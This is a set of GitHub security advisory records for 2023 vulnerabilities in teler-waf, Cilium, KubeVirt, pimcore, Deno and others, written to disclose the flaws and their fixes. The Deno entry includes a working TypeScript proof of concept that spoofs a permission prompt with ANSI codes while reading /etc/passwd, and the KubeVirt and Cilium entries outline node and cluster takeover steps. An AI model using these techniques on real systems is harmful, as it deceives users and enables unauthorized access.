{'cwe_ids': ['CWE-22', 'CWE-276', 'CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T23:12:17Z', 'nvd_published_at': '2023-03-23T21:15:00Z'}
|
1.4.0
|
GHSA-p2pf-g8cq-3gq5
|
2023-03-10T15:31:39Z
|
2023-03-01T20:37:23Z
| null |
['CVE-2023-26047']
|
teler-waf contains detection rule bypass via Entities payload
|
### Description
teler-waf is a Go HTTP middleware that provides teler IDS functionality to protect against web-based attacks. teler-waf prior to version v0.2.0 is vulnerable to a bypass attack when a specific case-sensitive hex entities payload with special characters such as CR/LF and horizontal tab is used. This vulnerability allows an attacker to execute arbitrary JavaScript code on the victim's browser and compromise the security of the web application.
### Impact
An attacker can exploit this vulnerability to bypass common web attack threat rules in teler-waf and launch cross-site scripting (XSS) attacks. The attacker can execute arbitrary JavaScript code on the victim's browser and steal sensitive information, such as login credentials and session tokens, or take control of the victim's browser and perform malicious actions.
### Patches
Version [v0.2.0](https://github.com/kitabisa/teler-waf/releases/tag/v0.2.0) includes a patch for this vulnerability.
### Workarounds
We advised updating their installations to version v0.2.0 and frontwards immediately.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/kitabisa/teler-waf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/kitabisa/teler-waf/security/advisories/GHSA-p2pf-g8cq-3gq5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26047'}, {'type': 'WEB', 'url': 'https://github.com/dwisiswant0/cwa-filter-rules/commit/d818d1645832d1a02cd210c7680e692d2bf4313b'}, {'type': 'WEB', 'url': 'https://github.com/kitabisa/teler-waf/commit/6e1b0e19b8adc1bbc3513a986025d4adf88d59f8'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-p2pf-g8cq-3gq5'}, {'type': 'PACKAGE', 'url': 'https://github.com/kitabisa/teler-waf'}, {'type': 'WEB', 'url': 'https://github.com/kitabisa/teler-waf/compare/v0.1.2...v0.2.0'}, {'type': 'WEB', 'url': 'https://github.com/kitabisa/teler-waf/releases/tag/v0.2.0'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1600'}]
|
{'cwe_ids': ['CWE-692', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T20:37:23Z', 'nvd_published_at': '2023-03-03T23:15:00Z'}
|
1.4.0
|
GHSA-gvg8-r8w2-9gfj
|
2023-04-26T20:34:32Z
|
2023-03-31T03:30:31Z
| null |
['CVE-2023-1754']
|
phpMyFAQ vulnerable to improper input validation
|
Improper Neutralization of Input During Web Page Generation in phpMyFAQ
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1754'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/d773df925cb74e874527458beed1f66f966ec491'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/529f2361-eb2e-476f-b7ef-4e561a712e28'}]
|
{'cwe_ids': ['CWE-20', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:43:17Z', 'nvd_published_at': '2023-03-31T01:15:00Z'}
|
1.4.0
|
GHSA-4hc4-pgfx-3mrx
|
2023-03-17T21:38:36Z
|
2023-03-17T18:20:46Z
| null |
['CVE-2023-27593']
|
cilium-agent container can access the host via `hostPath` mount
|
### Impact
An attacker with access to a Cilium agent pod can write to `/opt/cni/bin` due to a `hostPath` mount of that directory in the agent pod. By replacing the CNI binary with their own malicious binary and waiting for the creation of a new pod on the node, the attacker can gain access to the underlying node.
### Patches
The issue has been fixed and is available on versions >=1.11.15, >=1.12.8, >=1.13.1.
### Workarounds
[Kubernetes RBAC](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) should be used to deny users and service accounts `exec` access to Cilium agent pods.
In cases where a user requires `exec` access to Cilium agent pods, but should not have access to the underlying node, no workaround is possible.
### References
* [PR containing resolution](https://github.com/cilium/cilium/pull/24075)
### Acknowledgements
The Cilium community has worked together with members of Isovalent and Form3 to prepare these mitigations. Special thanks to Anastasios Koutlis, Daniel Teixeira, and Magdalena Oczadly for their cooperation.
### For more information
If you have any questions or comments about this advisory, please reach out on [Slack](https://docs.cilium.io/en/latest/community/community/#slack).
As usual, if you think you found a related vulnerability, we strongly encourage you to report security vulnerabilities to our private security mailing list: security@cilium.io - first, before disclosing them in any public forums. This is a private mailing list where only members of the Cilium internal security team are subscribed to, and is treated as top priority.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.15'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/cilium/cilium/security/advisories/GHSA-4hc4-pgfx-3mrx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27593'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/pull/24075'}, {'type': 'PACKAGE', 'url': 'https://github.com/cilium/cilium'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/releases/tag/v1.11.15'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/releases/tag/v1.12.8'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/releases/tag/v1.13.1'}, {'type': 'WEB', 'url': 'https://kubernetes.io/docs/reference/access-authn-authz/rbac/'}]
|
{'cwe_ids': ['CWE-276'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T18:20:46Z', 'nvd_published_at': '2023-03-17T20:15:00Z'}
|
1.4.0
|
GHSA-cp96-jpmq-xrr2
|
2023-03-27T22:24:34Z
|
2023-03-16T16:04:42Z
| null |
['CVE-2023-26484']
|
On a compromised node, the virt-handler service account can be used to modify all node specs
|
### Impact
If a malicious user has taken over a Kubernetes node where virt-handler (the KubeVirt node-daemon) is running, the virt-handler service account can be used to modify all node specs.
This can be misused to lure-in system-level-privileged components (which can for instance read all secrets on the cluster, or can exec into pods on other nodes). This way a compromised node can be used to elevate privileges beyond the node until potentially having full privileged access to the whole cluster.
The simplest way to exploit this, once a user could compromise a specific node, is to set with the virt-handler service account all other nodes to unschedulable and simply wait until system-critical components with high privileges appear on its node.
Since this requires a node to be compromised first, the severity of this finding is considered Medium.
### Patches
Not yet available.
### Workarounds
Gatekeeper users can add a webhook which will block the `virt-handler` service account to modify the spec of a node.
An example policy, preventing virt-handler from changing the node spec may look like this:
```yaml
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
name: virthandlerrestrictions
spec:
[...]
targets:
- libs:
- |
[...]
is_virt_handler(username) {
username == "system:serviceaccount:kubevirt:virt-handler"
}
mutates_node_in_unintended_way {
# TODO
# only allow kubevirt.io/ prefixed metadata node changes
}
rego: |
[...]
violation[{"msg": msg}] {
is_virt_handler(username)
mutates_node_in_unintended_way(input.review.object, input.review.oldObject)
msg := sprintf("virt-handler tries to modify node <%v> in an unintended way.", [input.review.object.name])
}
```
and applying this template to node modifications.
### Credits
Special thanks to the discoverers of this issue:
Nanzi Yang (nzyang@stu.xidian.edu.cn)
Xin Guo (guox@stu.xidian.edu.cn)
Jietao Xiao (jietaoXiao@stu.xidian.edu.cn)
Wenbo Shen (shenwenbo@zju.edu.cn)
Jinku Li (jkli@xidian.edu.cn)
### References
https://github.com/kubevirt/kubevirt/issues/9109
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'kubevirt.io/kubevirt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.59.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/kubevirt/kubevirt/security/advisories/GHSA-cp96-jpmq-xrr2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26484'}, {'type': 'WEB', 'url': 'https://github.com/kubevirt/kubevirt/issues/9109'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubevirt/kubevirt'}]
|
{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T16:04:42Z', 'nvd_published_at': '2023-03-15T21:15:00Z'}
|
1.4.0
|
GHSA-rrwm-8wqm-gwgv
|
2023-03-16T18:33:28Z
|
2023-03-16T18:33:28Z
| null |
[]
|
Cross-site Scripting (XSS) - stored in Print Documents
|
### Impact
Stored xss leads to steal cookies and other information of other users
### Patches
Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/pull/14560.patch
### Workarounds
Apply https://github.com/pimcore/pimcore/pull/14560.patch manually.
### References
https://huntr.dev/bounties/31d97442-3f87-439f-83f0-1c7862ef0c7c/
|
[]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-rrwm-8wqm-gwgv'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T18:33:28Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wmx7-x4jp-9jgg
|
2023-03-07T20:04:42Z
|
2023-03-07T20:04:42Z
| null |
['CVE-2022-41918']
|
OpenSearch has issue with fine-grained access control of indices backing data streams
|
### Impact
There is an issue with the implementation of fine-grained access control rules (document-level security, field-level security and field masking) where they are not correctly applied to the indices that back data streams potentially leading to incorrect access authorization. This issue can only be triggered by authenticated users authorized to read those data streams which are backed by the impacted indexes. Additionally, existing privileged users cannot access random indexes within these clusters; they can only access indexes to which they have already been granted permission.
### Patches
OpenSearch 1.3.7 and 2.4.0 contain a fix for this issue.
### Workarounds
There is no recommended work around.
### For more information
If you have any questions or comments about this advisory, please contact AWS/Amazon Security via our issue reporting page (https://aws.amazon.com/security/vulnerability-reporting/) or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.opensearch.plugin:opensearch-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.opensearch.plugin:opensearch-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.4.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/opensearch-project/security/security/advisories/GHSA-wmx7-x4jp-9jgg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-41918'}, {'type': 'WEB', 'url': 'https://github.com/opensearch-project/security/commit/f7cc569c9d3fa5d5432c76c854eed280d45ce6f4'}, {'type': 'PACKAGE', 'url': 'https://github.com/opensearch-project/security'}]
|
{'cwe_ids': ['CWE-612', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:04:42Z', 'nvd_published_at': '2022-11-15T23:15:00Z'}
|
1.4.0
|
GHSA-hfmg-g39c-5444
|
2023-03-31T16:23:49Z
|
2023-03-31T16:23:49Z
| null |
['CVE-2023-1704']
|
pimcore is vulnerable to cross-site scripting in translate module
|
### Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites.
### Patches
Update to version 10.5.20 or apply this patch manually https://github.com/pimcore/pimcore/pull/14732.patch
### Workarounds
Apply https://github.com/pimcore/pimcore/pull/14732.patch manually.
### References
https://huntr.dev/bounties/84419c7b-ae29-401b-bdfd-5d0c498d320f/
|
[]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.20'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-hfmg-g39c-5444'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1704'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14732.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/295f5e8d108b68198e36399bea0f69598eb108a0'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/84419c7b-ae29-401b-bdfd-5d0c498d320f'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T16:23:49Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vq67-rp93-65qf
|
2023-03-24T22:06:01Z
|
2023-03-24T22:06:01Z
| null |
['CVE-2023-28446']
|
Interactive `run` permission prompt spoofing via improper ANSI neutralization
|
### Summary
Arbitrary program names without any ANSI filtering allows any malicious program to clear the first 2 lines of a `op_spawn_child` or `op_kill` prompt and replace it with any desired text.
### Details
The main entry point comes down to the ability to override what the API control says ([40_process.js](https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175)). Because of ANSI code's ability to clear lines, a malicious program can clear the last 2 lines of the prompt and put their own header. This also works in `op_kill`.
### PoC
This PoC works on 1.31.1, but modified versions of it work on older versions.
Make a file, e.g. `index.ts`, that uses this vulnerability to spoof the `op_spawn_child` permission prompt
```ts
const boldANSI = "\u001b[1m" // bold
const unboldANSI = "\u001b[22m" // unbold
const prompt = `┌ ⚠️ ${boldANSI}Deno requests run access to "echo"${unboldANSI}
├ Requested by \`Deno.Command().output()`
const moveANSIUp = "\u001b[1A" // moves to the start of the line
const clearANSI = "\u001b[2K" // clears the line
const moveANSIStart = "\u001b[1000D" // moves to the start of the line
Deno[Object.getOwnPropertySymbols(Deno)[0]].core.ops.op_spawn_child({
cmd: "cat",
args: ["/etc/passwd"],
clearEnv: false,
env: [],
stdin: "null",
stdout: "inherit",
stderr: "piped"
}, moveANSIUp + clearANSI + moveANSIStart + prompt)
```
Run the file with `deno run index.ts`.
### Impact
Any Deno program is able to spoof the interactive permission prompt for the `op_spawn_child` or the `op_kill` action (which indirectly gives access to all run commands) by overriding the `Requested by {message} API` with their own ANSI codes, allowing them to clear the latter prompt and change it to whatever they needed:
```
// Expected Prompt
┌ ⚠️ Deno requests run access to "cat"
├ Requested by `Deno.Command().output()` API
├ Run again with --allow-run to bypass this prompt.
└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) >
// Actual Prompt
┌ ⚠️ Deno requests run access to "echo"
├ Requested by `Deno.Command().output()` API
├ Run again with --allow-run to bypass this prompt.
└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) >
```
This works with any command on the respective platform, giving the program the full ability to choose what program they wanted to run.
This problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers).
Before `v1.31.0`, this requires the `--unstable` flag.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'deno_runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'fixed': '1.31.2'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'deno'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'fixed': '1.31.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/denoland/deno/security/advisories/GHSA-vq67-rp93-65qf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28446'}, {'type': 'PACKAGE', 'url': 'https://github.com/denoland/deno'}, {'type': 'WEB', 'url': 'https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175'}, {'type': 'WEB', 'url': 'https://github.com/denoland/deno/releases/tag/v1.31.2'}]
|
{'cwe_ids': ['CWE-150'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T22:06:01Z', 'nvd_published_at': '2023-03-24T20:15:00Z'}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.